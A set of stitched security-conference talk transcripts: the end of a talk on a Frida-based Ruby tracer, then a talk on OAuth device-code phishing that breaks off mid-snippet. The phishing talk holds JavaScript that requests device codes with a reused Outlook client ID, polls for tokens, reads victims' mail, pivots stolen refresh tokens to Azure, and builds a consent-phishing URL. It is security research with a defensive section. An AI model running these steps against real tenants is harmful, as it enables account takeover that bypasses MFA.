together a larger set of hooks from a smaller set of modular pieces. You are in a good position to do this because you're hooking on to a full program that already exists and runs on its own. So mostly you just need to make sure that you don't break it with what you're doing and injecting into it. But other than that, the thing will continue to run on its own just fine. So the next thing about this layering stuff is that you can take advantage of, you know, layering on abstract calls that are implemented with version-specific behaviors. So for example, if you have a pointer to a struct, but between two different versions of the binary the field you want that's inside of that struct is at a different offset, you need to have some functionality to be able to handle that. But the pointer to the start of it is still the same. So you could do this with per-version implementations or version-based switches, kind of like ifdefs, or both. But let's talk about Ruby. So Ruby is a scripting language. That's right. The most interesting thing about Ruby is it's super object-oriented, and every time you try to access something on an object that's actually a method call and all the method calls are basically handled via sending messages. Ruby is super featureful, but it doesn't have really any good low-level introspection or tracing capabilities. It does have this thing called TracePoint, which is an API for various events that go on as Ruby executes. But it can't really intercept method arguments or native function parameters. It can't really provide information on bytecode execution, and it doesn't really provide all that useful information for any time you're switching back and forth between Ruby and native code.
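To make the Ruby case concrete, here is a rough sketch in the same frida-python style that intercepts a public CRuby C API entry point, rb_funcallv, and resolves names through rb_id2name and rb_obj_classname, which is roughly the kind of visibility TracePoint does not give you. Symbol availability depends on how Ruby was built, the attach target is a placeholder, and calling back into the VM from inside a hook is exactly the kind of thing that can blow up if the VM is not in a sane state, so this is an illustration rather than anything production-grade.

    # Rough sketch: trace Ruby method dispatch by hooking the public C-API entry point
    # rb_funcallv and resolving names via rb_id2name / rb_obj_classname. Slots into the
    # same frida-python scaffold as the previous example; the attach target is a placeholder.
    import frida

    js = r"""
    const libruby = null; // or a specific module name if the symbols live in a shared lib
    const funcallv = Module.findExportByName(libruby, 'rb_funcallv');
    const rb_id2name = new NativeFunction(
        Module.findExportByName(libruby, 'rb_id2name'), 'pointer', ['pointer']);
    const rb_obj_classname = new NativeFunction(
        Module.findExportByName(libruby, 'rb_obj_classname'), 'pointer', ['pointer']);

    Interceptor.attach(funcallv, {
      onEnter(args) {
        // VALUE rb_funcallv(VALUE recv, ID mid, int argc, const VALUE *argv)
        // Calling back into the VM from a hook is risky if the VM isn't in a sane state.
        const klass = rb_obj_classname(args[0]).readUtf8String();
        const meth  = rb_id2name(args[1]).readUtf8String();
        send(klass + '#' + meth + '/' + args[2].toInt32());
      }
    });
    """

    session = frida.attach("ruby")          # placeholder target
    script = session.create_script(js)
    script.on("message", lambda msg, data: print(msg))
    script.load()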
This is mostly an artifact of the fact that Ruby is a language and CRuby is an implementation. So this bytecode stuff, all this lower-level stuff, are kind of implementation details. And this API needs to theoretically work across multiple different Ruby implementations. But really, the CRuby implementation should have better tracing stuff given that it basically functions similarly to Java, and Java has a very well-defined and extensive API for instrumentation. So I wrote this thing called Ruby Trace, which is a Frida-based CLI tool for instrumenting Ruby and kind of dumping everything that goes on as it executes. So it hooks all the opcodes. The interesting thing about that is the implementations of the opcode handlers are kind of all a bunch of labeled goto spots in a giant state machine. They're not really their own functions. They don't have your standard calling convention prologues. And then separately, Ruby has a bunch of C functions to call Ruby methods and do a whole bunch of stuff about handling the methods and tying them to objects, both native code to Ruby and Ruby back to native code calls. So I hook all that stuff, and I hook the transition between Ruby and native code, and then hook those native functions, and et cetera. And then separately, it supports kind of hooking into Ruby's internal exception handling mechanisms. What it pulls out of that is basically all the arguments of all kinds, even the special internal ones for the opcodes, and then it basically Ruby inspects everything, which is a stringification, kind of like repr in Python. One problem with that is many times values aren't fully initialized or the Ruby VM itself isn't fully initialized. You need to be very careful about how you try to call things on things that aren't fully initialized. So it handles a lot of that, trying to be very careful about when it's safe to actually send the inspect method over and doing alternative fallback approaches when it can't. It dumps out the bytecode whenever you see something like a method or a block being defined. It dumps all the return values for opcodes and the native functions it hooks, it gets all sorts of other metadata, and does all sorts of things to make them human readable. It supports Ruby 2.6 through 3.0, and I assume once 3.1 comes out, it won't be too much effort to get it working on 3.1. I have a sort of generic implementation with a couple of version-specific behaviors and switches, and then for a separate lower level, anytime I need to deal with Ruby structs from C, I just have a version-specific set of structs to pull fields from, essentially, using Frida's CModule API. So other cool things that it does is it actually makes use of the TracePoint API, but not in the way you'd expect. It's just that the TracePoint API has a very good way of controlling whether or not it's enabled based on various aspects. And so whenever tracing via the TracePoint API is enabled, that turns my tracing on, and whenever it's turned off, it turns it off. It gives you fine-grained control to very minutely trace certain pieces of execution. I have a bunch of test cases for various bytecode sequences that seem to cover a greater span and more detail of edge cases than Ruby's own internal opcode test suite, although not necessarily some of the other ones. I also implement support for dead Ruby opcodes that shouldn't even exist anymore for some reason. But basically, Ruby Trace is kind of like its own CRuby bytecode interpreter because of how it works. So as a demo, let's switch to this view.
So I have some Ruby code here that defines a TracePoint tracer. And then in the middle, this big block is actually a stringified block of this Ruby code with this foo method and then some calls into it. And then it reopens Symbol to redefine its triple equals operator, then calls a lot of those same things over again. And then it compiles that code from the string and then evaluates it under the tracing. So in this case, the tracer that's being used doesn't really do anything. So when you run this code, it just kind of spits things out. The more interesting thing is that the not-found wat on the left side gets replaced with a symbol on the right side, because that redefined triple equals, when it hits the comparison for the symbol, mistakenly matches stuff. So the wat string will, in the last case, hit the symbol check against :foo, and that will just pass. So now let's run this under Ruby Trace. And basically Ruby Trace dumps out a whole bunch of stuff. One of the first things you can see is the instruction sequence from that compilation, and then you see the call to eval on it. And then we're inside of that. The first thing that happens is the foo method is defined. And so it dumps out all of the bytecode of that foo method. We can see a bunch of values from it. Next it adds that to the class it's in. Then we see the first call into foo from the hello string. And then we run through that check operation. So the first thing that happens we see is a call into this opt_case_dispatch, which is a special case bytecode generated for switches that don't have special types in them, only simple types. And basically it optimizes so that all of the cases get added into a single Ruby hash and then it just checks if the value is a member of the hash. But it first checks a bunch of things about the object coming in to make sure it's a simple type so that the comparison would work in the first place. So in this case hello is the string, it's a simple string, it's in there, it takes the hello path, we move on. The next thing is we have one, it takes the one path and so forth. But then we eventually see this BigDecimal 3.0 value, which you'll see represented variously as 0.3e1. And that thing will get passed in to foo. And the problem is that because it is not a simple type, it will fall through. And the way that this works is that the optimization is just a quick check first, and it is kind of a guard on top of what the rest of the switch implementation would be, which is a series of subsequent if-else checks. That's just how Ruby does it. And so it falls through and then starts doing all of the if-elses. It doesn't match like a string, it doesn't match a whole bunch of stuff. And then eventually we see a bunch of operations where it's trying to compare against the float value and the BigDecimal has to do a bunch of math conversions to get the stuff out for the comparison. And so then it eventually does the comparison and sees that 0.3e1 is equal to the 3.0 float. And so then checkmatch passes, that's the comparison for the branch, and then it jumps to the code that is part of its segment of the branch. We continue doing all of this for the rest of the values. We see in this case the string wat. It doesn't match anything, so it ends up in the else path. But it was a simple type, so it actually goes to the else path directly. And then we see the code that redefines Symbol's triple equals method. And from this point on, things are going to get a little bit weird.
So we start seeing that all of these opt_case_dispatches end up falling through because triple equals has been redefined. And so basically there's a short circuit in the implementation where Ruby says, well, if any of these core equals things has been redefined on any of the core types, such as Symbol, it just doesn't bother to do any of the optimized comparisons anymore one way or the other. And it's faster to just give up and have them go through all of the checks one at a time. And so we run through this all one after another, and then we get to the end with all the values and they get percolated up from all the functionality. So, future work: I have to implement support for Ractors, Ruby's new multi-VM in-process concurrency model. Right now I'm just kind of relying on the one global Ruby VM internal to the process. And then just generally keeping up with the Ruby versions. The code will be available here at our GitHub repo shortly after this presentation airs. But in conclusion, it's been really fun working on this, although it's been pretty tiring because of all the craziness that goes on with Ruby and various random things that can fail when you're messing around in its insides. But I think that all of these techniques pretty much apply to other high level languages and runtimes. Some good examples are Python, Node, Golang, and Haskell. And I really think people should be trying to build some of these things. So to paraphrase Arlo Guthrie. You know, if one person, just one person does it, they may think he's really sick. But three people do it. Three. Can you imagine three people writing parasitic tracers? They may think it's an organization. And can you imagine 50 people? I said 50 people writing these tracers, friends, they may think it's a movement. And that's what it is. I'd like to thank Addison, my partner in crime on the Ruby stuff that led us down this rabbit hole, for me doing this work. And a wise man once said, you can't hide secrets from the future using math. I believe that is true, but I also believe it is true that you simply can't hide from the future. I would take questions, but this is a recording, so there are no questions to be had. So instead, I will answer a question about why on my intro page, I used an image from Pokemon Crystal and not Pokemon Ruby. Well to answer that question, I do not like Ruby-lang. I do not like its yuppie gang. I do not like its symbol keys. I do not like its optional parentheses. I do not like its method send. I do not like its begin and end. I do not like its magic verbs. I do not like its an athotic keywords. I do not like its IO.read. I do not like its lackluster speed. I do not like its dlopen JIT. I do not like strong params permit. I do not like its if unless. I do not like its dependency mess. I do not like its case in when. I do not like its require middleman. I do not like its polymorphism. I do not like its object fanaticism. Its object nil gives me pain. That Ruby-lang is profane. Thank you.
|
Modern programming languages are, more and more, being designed not just around performance, ease-of-use, and (sometimes) security, but also performance monitoring and introspectability. But what about the languages that never adopted such concepts from their peers? Or worse, what about the languages that tacked on half-hearted implementations as an afterthought? The answer is simple, you write your own and instrument them into the language dynamically. In this talk, we will discuss the process for developing generalized parasitic tracers targeting specific programming languages and runtimes using Ruby as our case study. We will show how feasible it is to write external tracers targeting a language and its runtime, and discuss best practices for supporting different versions over time. REFERENCES: * https://github.com/ruby/ruby * https://frida.re/docs/javascript-api/
|
10.5446/54216 (DOI)
|
Hi, welcome. Today I'm going to be talking about new fishing attacks that exploit OOF authorization flows. My name is Janko Wong. I'm currently a researcher at Netscope. There are some of the areas that I've dabbled in and are interesting to me from a research perspective. So to recap some of the past about fishing, I'd like to just spend a minute talking about that so that we can understand some of the latest evolution of techniques. So in the beginning, certainly fishing was predominantly carried over SMTP. This is probably late 90s when we started to see fishing. Tacker is very focused on fake domains, creating them, hosting websites, maybe creating SSL certs as well to lend some validity to their fake sites and ultimately tricking the user into supplying their username and password. As mobile came along, more apps, app protocols came fishing then targeted those applications. So we got SMS fishes, smashes, IMs, chats. For the most part, a lot was the same but because of the limited UX and real estate, certain things like URL shortners being able to detect the SSL cert or even see the URL were different or challenges affecting the user as well as any software security controls in the picture. With cloud infrastructure providers, suddenly the attackers had an easier way to host their actual fake website. On top of that, the domains now and the SSL certs reflected those same popular cloud providers so the victims as well as the security controls had more of a challenge in detecting fake domains, fishes, certs, etc. So none of this is new. In this case, maybe the attackers trying to create something like Citibank's website hosted in Azure. The controls I alluded to and for the most part grew into a series of techniques up front. Detection of fishes using various link analysis, domains, URLs, the certs themselves, checking on the sender reputation, having thread and tell that helps with that so that the fish on an incoming basis could be blocked before reaching the user. Post user receiving an actual fish, some of the same techniques might be used to prevent the user from actually connecting on an HTTP request outbound to the fake website. There might be additional content inspection used to detect credentials within the payload as well, form, fields, etc. Ultimately, if credentials were hijacked, a set of controls like MFA and policies governing IP addresses that could be used with credentials also were applied. MFA especially was pretty effective at minimizing the impact of compromised credentials. So none of this is new. This has been sort of 10 or 20 years of fishing evolution. If I could simplify it at that. Now what's changed with some of the last few years? Well, as OAuth, which was introduced in 2013 as OAuth got more popular, driven a lot by security and the interaction of all these websites and web apps, that part of OAuth that dealt with authorization in a secure manner, became very popular and sort of has caused us to rethink both how to fish and how to defend against it. And OAuth at a high level, if you're not that familiar, involves the application. This could be the website or it could be a local application on the desktop or mobile often referred to as the client or device. Well, the application might request authorization from the user to do something and that could be approve, pay, up payment, login, so on. And it directs the user to identity platform. Part of OAuth model is to not have applications handle, know, store anything about the user credential. 
So in this case, there's a redirect. The user then authenticates as they would with their identity platform. And when we're talking about OAuth, it's really Azure AD or Google identity. That authentication process could be very secure and have MFA. Ultimately, the user is presented with some kind of authorization step, approve these permissions, approve this task. The permissions are called scopes in OAuth land. And if everything goes well, session tokens, OAuth session tokens, are supplied back to the application. The application has these access tokens and can generate new ones with the refresh token and can use it to actually gain access to the resources of the user or to perform a task because they essentially have post authentication status. So as a user, this is familiar in various contexts. One is payments, you're shopping, you get to check out and PayPal, which is an OAuth provider, allows websites to easily offer a pay-with-PayPal flow. If you click through as a user, it redirects you to PayPal so that you can go through your authentication with MFA. And right now, we're dealing with PayPal as a user, so the original website does not see or have a chance to compromise your credentials. And as you complete the process with PayPal, you end up on the right with their version of an authorization or consent screen, which is, do you agree to pay that original website such and such money for whatever you are shopping for? There are other contexts, even technical tools like CLIs in Google Cloud have a login process, of course. And in this case, it creates a URL that you can copy and paste into a browser, but it's actually an OAuth flow. And in the browser, once you go to that URL, you're prompted to enter your username and password. And then you get to a consent screen saying, hey, the CLI, which is really registered as the Google Cloud SDK, wants access to your Google account, and it's asking for these permissions. If you go ahead and hit allow, you just confirm, then you see some confirmation messages and back on the command line, you might see a final message that, hey, you're now logged in. So initially phishing responded to this new authorization identity platform called OAuth with similar techniques, just here's a new login. Great, we have an OAuth login, but it's just another login, I'll spoof it. So a lot of this was business as usual from the phishing side. However, we did see some evolution where the code presenting that actual fake login would actually do a real-time validation check against the identity provider to validate that credential. And then based on whether it was valid or not, it might take different actions that would help maintain stealth. It might redirect to a valid domain login screen or something else, depending. And that might help prevent the user from maybe raising a flag manually. It also provides an opportunity to validate credentials up front so that you could do that check right away instead of later. The controls for the most part, I would say, have stayed the same because really the techniques have not changed much. So why do we care to maybe delve and research into the protocol deeper? Right, so far this hasn't made much difference. Well, obviously I wouldn't be talking if that were the case. Here's why attackers have delved deeper and why from a research perspective it's worth us focusing on this. One is instead of targeting the username and password, we target the OAuth session tokens. There are some advantages there.
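To make the value of a hijacked token concrete, this is roughly all it takes to use one: a single REST call with a Bearer header. The Microsoft Graph "me" endpoint is just an example resource, and the token value is obviously a placeholder for something obtained elsewhere.

    # What a stolen OAuth access token is worth in practice: one header on a REST call.
    # The endpoint is just an example (Microsoft Graph "who am I"); the token is a placeholder.
    import urllib.request

    access_token = "eyJ0eXAiOiJKV1QiLCJhbGciOi..."  # hijacked or otherwise obtained elsewhere

    req = urllib.request.Request(
        "https://graph.microsoft.com/v1.0/me",
        headers={"Authorization": f"Bearer {access_token}"},
    )
    with urllib.request.urlopen(req) as resp:
        print(resp.read().decode())

Note that nothing in that request involves a password or an interactive MFA prompt.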
The OAuth model essentially allows a refresh of them, and the defaults pretty much allow you to do that forever. The session token gives you the same power as the original credential, and it has one advantage, which is that you don't have to re-challenge with MFA. If MFA is enabled, once the user goes through it manually, the tokens are effectively blessed, and the refresh token allows this unlimited ability to maintain a long-duration credential. So getting access to session tokens effectively allows us to, quote, bypass MFA. The second reason is that all of this is REST-enabled, so hijacking the actual tokens does not require compromising an endpoint. We have these nice REST APIs, we have a complicated flow, and there's the ability to insert ourselves into the flow or perhaps gain access to tokens remotely, which is huge — because tokens are not a new concept. They've been around since the beginning of the web: we've had web sessions and session IDs kept in cookies or local storage, we've had web attacks, SSRF among them, that exploited those sessions to hijack them, and we've had endpoint compromises that also looked at grabbing or harvesting those tokens. However, there's a pretty high bar to take advantage of that, because you would have to compromise the endpoint or do a browser attack. This is far easier — far easier because we have REST APIs, and we'll see that in the upcoming deep dives. So there have been actual attacks that have exploited the protocol; one of them is called the illicit consent grant. In an illicit consent grant, the attacker exploits broad consent privileges and tricks the user into approving them. This works by the attacker creating their own application — a fake application, perhaps named close to an existing app — and registering it in the identity platform, possibly under their own account. They ultimately send out a phish to the user requesting broad scopes to some resource. Imagine it could be named "Google Drive", "MySync" — some name that seems plausible — and it asks the user to give this application read and write access to everything in Google Drive. If I can get the user to click, they'll approve these broader scopes, and OAuth tokens will be created and become accessible to the attacker, because the application that's part of the flow specifies how to retrieve those tokens — they actually get pushed through a redirect URL to the application. So from the victim's perspective, either the user has to identify or know that it's a fake application, or a security or IT administrator needs to be able to prevent users from clicking and approving these app requests. This happened — there's a reference here from just the last year or so of illicit consent grant attacks. From a user perspective, they just see a consent screen with a list of permissions that might be wider or deeper than they expect. The controls against these are, as I mentioned, for the administrators running the organization and watching the network: they can prevent users from creating or registering fake apps in AD, which might prevent an insider attack, and they can prevent users from consenting and hitting accept. That changes the flow so users aren't actually presented an accept button — the administrator is in control.
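As a rough illustration of the illicit consent grant technique described above, the phishing link is typically just a standard authorization URL for the attacker-registered app, asking for broad scopes. The client ID, redirect URI, and scopes below are placeholders chosen for illustration — this is a sketch of the concept, not a snippet from any real attack or from the talk's tooling.

```javascript
// Sketch: building the consent URL a fake app might send in an illicit consent grant phish.
// Shown against the Azure AD v2 authorize endpoint; all IDs/URIs are placeholders.
const params = new URLSearchParams({
  client_id: "<attacker-registered-app-id>",
  response_type: "code",
  redirect_uri: "https://attacker.example.com/callback", // attacker-controlled; receives the auth code
  response_mode: "query",
  scope: "offline_access Mail.Read Files.ReadWrite.All",  // broad scopes the victim is tricked into approving
  state: "12345",
});
const consentUrl =
  "https://login.microsoftonline.com/common/oauth2/v2.0/authorize?" + params.toString();
// The phish only has to get the victim to open consentUrl and click "Accept".
console.log(consentUrl);
```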
I just wanted to point out that the Microsoft documentation explains this flow with a nice 12-point numbered diagram — I did not add that; it's actually part of the documentation, and the points are explained pretty well there. Kudos to them. It's great as a researcher, but I have to say, as a user, it's extremely confusing to have 12 points to explain an OK dialog. This is where complexity is the enemy of security. So let's get to device code authorization, which is really the flow I want to focus on today. What's the purpose? Briefly: usability — easier authentication and authorization on a limited-input device where you still need some kind of authorization and authentication. The best example is a smart TV, where you need to authenticate against your content subscription so you can get your movies on the TV. They all have this menu these days; it could be a device like a Roku or Apple TV. The problem is, if you were to enter that credential on the actual device, you'd be faced with typing it on a remote control — completely heinous. So there's an RFC to solve that: back in 2019, some smart people came up with a way to do it. When it's implemented, the application vendor — in this case the smart TV vendor — implements the device code flow, and now the user has a better experience. They're presented with a relatively short URL and told to go to a different device that has a real keyboard, punch in that URL and a relatively short code, and then go through a normal authentication or login process to approve this TV gaining access to, in this case, your Netflix subscription. They even have a QR code capability so that your mobile device can go to the URL directly. So that's all well and good: the user follows the URL, punches in that short code, and voila, everything's working. However, usability is one of the biggest drivers here, and I have a saying that unusability is the father of insecurity. It drives less security, and that is our opportunity to exploit: things get simplified, things get dropped, things get less secure, or things just aren't looked at from a security viewpoint. So let's look at device code authorization a little deeper. What really happens under the hood is that a user is trying to log in or do some task; the device gets a user code and sends the URL with that user code to the user so that they can authenticate, and once they do, OAuth tokens are created, which are then accessible from the device — similar to what I said before. But to show how easy it is to abuse that, or at least how difficult it is as a user to protect your credentials, I'd like to go through the demo now. Just a short note: Dr. Syynimaa has a great deal of information at his blog, o365blog.com — a super great resource. He has his toolset, AADInternals, and great material about Windows, AD, Outlook, and Office, as well as OAuth. I highly recommend it. So let's jump into the demonstration. To set the stage, the left side will be the browser of the victim, the right side will be the terminal of the attacker, and we'll go through an actual device code flow and see the implications from both sides. In this case we're logging into the standard URL for the company that Ed is part of, Feast Health, and we want to gain access first to Outlook. So we punch in username and password, get to two-factor — in this case it's software-based — and punch in that code. It asks if we want to stay signed in, we go through it, and boom, we're in Outlook.
Now meanwhile the attacker, independently thinking of phishing, will start up a script — running in demo mode here; this is part of the open source software we are releasing concurrently. I want to point out a few things. One of the first steps we're doing as part of the phishing is actually following the device code authorization flow: we're going to generate a code. If you look at the POST, we're specifying a set of APIs — the Graph API — as our resource, and we're using a client ID, the application client ID. In the OAuth world, when you create an application you get back an ID and a secret. We're actually reusing one: we didn't have to create an app to carry out this phish — this is the Outlook client ID that we're reusing. When we execute this first step, we get back a user code that we're going to phish the user with, along with the login URL, which is called the verification URL. We'll explain the other fields as we go. Now I'm going to send out the phish, and in a second the phish will appear. I'm going to pause and just say that after the phish is sent out, part of the device code authorization flow is to poll the identity platform — in this case Azure — for the OAuth tokens that will be created after the user logs in, so the script will sit there waiting. In a second — there it is — on the left we see a new email. Let's check it out: Ed has received an email from the Microsoft Office 365 product team. It is thanking Ed for being such a great customer, and as part of that he'll get one terabyte of extra storage and an increased attachment size limit of 100 megabytes. It's awesome — Ed can't resist, and he types in the code. Now, let me go back and point out that in the message there's a real URL: it's microsoft.com, nothing shady or funny. It's an actual link, and it points exactly to the text shown — it's part of the device code authorization. So you can see that some phish detection might fail right off the bat here on domain alone, because it was microsoft.com. Okay, so let's go back. Ed follows that link, punches in the code supplied in the phish, and what's happening is that he is being prompted to authenticate. Since he had already logged into Outlook, it is cached in the browser; otherwise he would type in his username and password and perhaps an MFA code and then get to this stage. I want to point out the prompt: are you trying to sign in to Microsoft Office? That "Microsoft Office" came from the use of the client ID in our initial phishing step — we use the client ID and we get the title. So there's continue, and that's it for the user: they entered the code, they authenticated, they're done. Meanwhile, the attacker script is polling, checking every five seconds — this is all part of the protocol for device code authorization. Now that the user is logged in, we should have OAuth tokens, and this will return in a few seconds with access tokens, session tokens — there it is.
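For readers who want to see roughly what the attacker script is doing at this point in the demo, here is a minimal sketch of the two device-code steps against Azure AD v1-style endpoints: requesting a user/device code, then polling the token endpoint. The client ID is a placeholder, and the talk's tooling (and AADInternals) should be treated as the authoritative implementation.

```javascript
// Sketch of the device code authorization steps used in the phish (Azure AD v1-style endpoints).
// CLIENT_ID is a placeholder for an existing first-party client ID (the talk reuses Outlook's).
const CLIENT_ID = "<existing-first-party-client-id>";
const RESOURCE = "https://graph.microsoft.com";
const BASE = "https://login.microsoftonline.com/common/oauth2";

async function getDeviceCode() {
  const resp = await fetch(`${BASE}/devicecode`, {
    method: "POST",
    body: new URLSearchParams({ client_id: CLIENT_ID, resource: RESOURCE }),
  });
  // Returns user_code (sent to the victim), device_code (kept by the attacker),
  // verification_url, expires_in, and the polling interval.
  return resp.json();
}

async function pollForTokens(deviceCode, intervalSec = 5) {
  for (;;) {
    const resp = await fetch(`${BASE}/token`, {
      method: "POST",
      body: new URLSearchParams({
        grant_type: "urn:ietf:params:oauth:grant-type:device_code",
        code: deviceCode,
        client_id: CLIENT_ID,
      }),
    });
    const data = await resp.json();
    if (data.access_token) return data;            // access_token + refresh_token once the victim signs in
    if (data.error !== "authorization_pending") throw new Error(data.error);
    await new Promise((r) => setTimeout(r, intervalSec * 1000)); // keep polling until expiry
  }
}
```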
So let's note a few things. Number one, what's in the response is the set of scopes associated with the tokens — these are the permissions we have with this token. The resource the tokens apply to is the Graph API, and we have an access token and a refresh token. This is great — so what can we do in the Graph API? You can see the indirection here: we put in an application, Microsoft Office — that's what the user thinks they've approved — and we've got access to the Graph API, which is a little bit broader than just Outlook. One thing we can do is get all AD users with that access token, running as Ed, with his permissions, and there's a list of three users: Ed included, David and Sandra. Just to compare, we'll go to Ed's view — the victim — in the Azure portal: we go to Azure Active Directory and check out the users, just to convince ourselves this is real, matching data. Right — it all matches. What else can we do? We can gain access to Ed's email. So we just did a call with that same access token and got three emails: a thank-you from the 365 team, some social security and credit card numbers — all looks great. Switch to Outlook as Ed and you can see in the inbox, in the mail pane on the left, the same emails. So through the Graph API we have access to email and some of AD. But to make it interesting, we want to show that you can actually pivot — move laterally — and trade in, or rather use, the refresh token we have to gain a different access token with different scopes, different implicit scopes. So let's get one that gives us access to more of Azure — all of the Azure resources. What do we do here? We use the refresh token that we got under the guise of Microsoft Office against the Graph API, and we use that refresh token to get a new access token that has access to the resources in Azure. We are still using the Outlook client ID, and for the scope — we have to specify a scope here; before we didn't, and we got back a bunch of scope permissions — here we're using openid, which is a pretty basic scope: the username, email, basic profile information. What we got back is interesting. The resource is Azure — that's fine — but look at the scope: it changed, which is part of the protocol; it comes back with what you really have access to. We asked for openid and we got back user_impersonation. User impersonation means we can do everything the user can within this resource area of Azure, and this user happens to be a global administrator — we have hit gold. We got a new access token, and this access token has that scope privilege for this resource, and we didn't really have to supply anything special — I want to point out, no secrets. So what can we do with that? Let's enumerate all resources in Azure, at least in the subscription Ed is part of. Okay, long list. Let's go back to the beginning and take a look. First we listed the subscriptions that this user — this token — has access to. Just to convince ourselves, in Ed's view in the portal, let's look at subscriptions: it is in fact "Azure subscription 1". Great. There are a bunch of resources in that subscription, so let's look at all resources and compare with what we retrieved, just to convince ourselves we're looking at real data: disks, compute, virtual machines, SSH keys. There's a storage account for data — "sajeh1" — listed right there, and that storage account has a container, "scjeh1". Drilling into that container, there are two files, ss1 and ss3.txt.
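Before moving on, here is a minimal sketch of what the stolen Graph access token was used for earlier in this part of the demo — listing directory users and reading the victim's mail. The token value is simply whatever came back from the device-code polling; this is my own illustration, not the talk's tooling.

```javascript
// Sketch: using a phished Graph access token to list AD users and read the victim's mail.
async function graphGet(path, accessToken) {
  const resp = await fetch(`https://graph.microsoft.com/v1.0${path}`, {
    headers: { Authorization: `Bearer ${accessToken}` },
  });
  return resp.json();
}

async function lootGraph(accessToken) {
  const users = await graphGet("/users", accessToken);               // all directory users, as the victim
  const mail = await graphGet("/me/messages?$top=10", accessToken);  // the victim's recent email
  console.log(users.value.map((u) => u.userPrincipalName));
  console.log(mail.value.map((m) => m.subject));
}
```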
And in fact, back in the portal, there is the container and there are ss1 and ss3, so everything matches up and we've just enumerated everything. And since Ed is a global administrator, we could do pretty much anything within the whole AD as well as the subscription. So that's the end of the phish, and the super interesting parts from this view are the pivot, and the fact that we did not need to supply any secrets along the way — it was really easy. Let's switch back and look at device code authorization in a little more detail, going back to the protocol itself, and figure out how we abused it to carry out that demo. Let me highlight a few things. When we turn this into a phish, we pretty much use the standard device code authorization, but of course there is no initial login or task by the user. Normally, with the smart TV example, the user is explicitly trying to hook up a streaming service and authenticate to it, so the user is expecting to be part of this flow. Here the attacker is in control and the user is sitting there minding their own business. We, as the attacker, start by generating a user code — and I want to point out this is a real snippet of all the key attributes in the REST API call to generate a code and get the standard URL. I supply a client ID, which we've seen can be spoofed, or rather can be an existing client ID, including the vendor's own — in this case it's Outlook's. I don't need to supply a secret here, and I can specify a resource, whether it's the Graph API or Outlook.com. I immediately get back the information I need to start my phish: the device code, which I'll use later; the user code, which I'll give to the user to log the device in; and the expiration time. I give that code to the user in my phish. If they're convinced — this is the key step, number four — they go and authenticate: enter the code, go through authentication including MFA, and once they're done, what's happened is that the device has been polling and checking the identity platform in the background, which will let it know once the user has finished logging in successfully, at which point OAuth tokens are created and returned as part of this polling API call. Look at all of the stuff that the application or device has done: no secrets required — all public information, in fact. Client IDs are, for the most part, easily determined for local clients, and they're also logged, so it's actually really easy in the Microsoft ecosystem to identify client IDs. No secrets are needed. So you can see that this is a little disturbing, because if you squint and step back and ignore the text, we now have a process where I just need to convince the user to type in a code at a standard Microsoft or Google URL. Just a note: I know I've mixed and matched Google URLs with Microsoft ones, but in all cases this is very real and quite common — all of these attributes are similar across both. What I was saying is that to carry out this phish, if you step back from it all, all you need to do is convince the user to go to a particular URL, enter a code, and authenticate. OAuth tokens will be created and stored by the identity platform, and you can go and retrieve them. That's a little bit crazy, right? You don't have to create your own infrastructure to do that — your own login page, your own application. You just have to point the user to the identity platform and give them a code, and then you have your tokens. Once you have the access tokens, the pivot from a Microsoft perspective looks like this.
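(A rough sketch of that refresh-token pivot is below: trading the Graph refresh token for an Azure Resource Manager access token and then enumerating subscriptions. The endpoints are the Azure AD v1-style ones the demo appears to use, the client ID is a placeholder, and the exact request on the talk's slide may differ.)

```javascript
// Sketch: pivoting by exchanging the phished refresh token for an ARM access token.
const CLIENT_ID = "<same-first-party-client-id-used-in-the-phish>";

async function pivotToAzure(refreshToken) {
  const resp = await fetch("https://login.microsoftonline.com/common/oauth2/token", {
    method: "POST",
    body: new URLSearchParams({
      grant_type: "refresh_token",
      refresh_token: refreshToken,
      client_id: CLIENT_ID,
      resource: "https://management.azure.com/", // ask for Azure Resource Manager instead of Graph
      scope: "openid",                           // we ask for a basic scope...
    }),
  });
  return resp.json(); // ...and the returned scope comes back as user_impersonation on ARM
}

async function listSubscriptions(armAccessToken) {
  const resp = await fetch("https://management.azure.com/subscriptions?api-version=2020-01-01", {
    headers: { Authorization: `Bearer ${armAccessToken}` },
  });
  return resp.json(); // subscriptions visible to the victim
}
```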
You make a refresh token call and you get back a fresh set of tokens, and here's where you can see the scope changes — we pointed this out during the demo, and this is just repeated to show it. So, to summarize some of the key points. What's common across OAuth vendors, not just Microsoft, is that device code authorization has three qualities: you don't need server infrastructure; you don't need to register your own OAuth application — in fact, you can use an existing one, even the vendor's own client application; and the user does not see a consent screen or a list of permissions. They're not prompted for that. They are prompted with the somewhat obscure "do you want to sign in to this application?" — but that's it. Not "do you want to grant this application access to everything in your email, all users in AD, your Azure, and other services" — they don't see that. Microsoft has a notion of implicit or default scopes: that is, in step two, the application, when it starts this whole process, never supplies a scope. Google is a bit different — you do supply a scope. It just means that the scopes you ultimately get with the OAuth tokens are things you never had to request, and we end up getting user_impersonation scopes in Microsoft, which allows us to do anything the user can do. Microsoft also allows this lateral move to other services — or resources, I should say — as that user, by being able to refresh a token for a different resource and get that back. Logging is limited. What is logged is when the attacker actually retrieves the OAuth tokens: their IP address is logged, and it shows as an actual authentication or sign-in in the Azure sign-in logs for this user. But this is limited, because the lateral move is not logged — the lateral move being when we refreshed the token to get an Azure access token; that was not logged. And the information is partial. Here are some of the details in that log entry: you can see the application ID is shown, but not much else. We know what user is operating here — the attacker did this retrieval of OAuth tokens for Ed — but it just looks like an action by Ed. Nothing identifies the attacker other than the IP address in the prior view, which can easily be obfuscated through a proxy or VPN. So what can reasonably be done to protect against this, and what challenges would be encountered? Probably the most effective measure would be blocking the verification URLs — that is, the sign-in URLs that start this whole process off for the user. There are some standard ones for Google; Microsoft has a couple, because one of them redirects to the other. So a security team could block those URIs. But it is an imperfect solution, because you might actually need to allow them for some valid logins. What's an example of that? Not a smart TV — that could probably be blocked against all policy — but it could be Azure: the Azure CLI does device code authorization, or at least has one flow where it does verbatim device code authorization. So you have to be careful about what breaks if you're on the defensive side. It just means there are cases where the prevention may be imperfect or can't be put in place. There are some recommendations to block access or use of tokens based on IP, location, or endpoint, and if that's within your control, it's a possibility — but IP allow lists are often a challenge, as are geolocation and other characteristics. So prevention is best described as imperfect but possible.
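As a sketch of what such blocking might look like operationally, the check below flags requests to device-login verification URLs. The URL list reflects the commonly documented Microsoft and Google verification endpoints, but it is an assumption on my part — verify the exact set for your environment before relying on it.

```javascript
// Sketch: a naive proxy/egress rule flagging device-code verification URLs.
// Verify these URLs for your tenant/environment; they are listed here as assumptions.
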